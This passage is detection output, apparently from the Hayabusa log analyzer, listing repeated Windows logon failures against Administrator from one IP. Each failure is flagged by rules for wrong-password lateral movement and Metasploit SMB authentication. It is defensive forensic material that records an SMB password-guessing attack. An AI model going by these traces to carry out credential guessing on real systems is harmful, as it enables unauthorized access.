Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
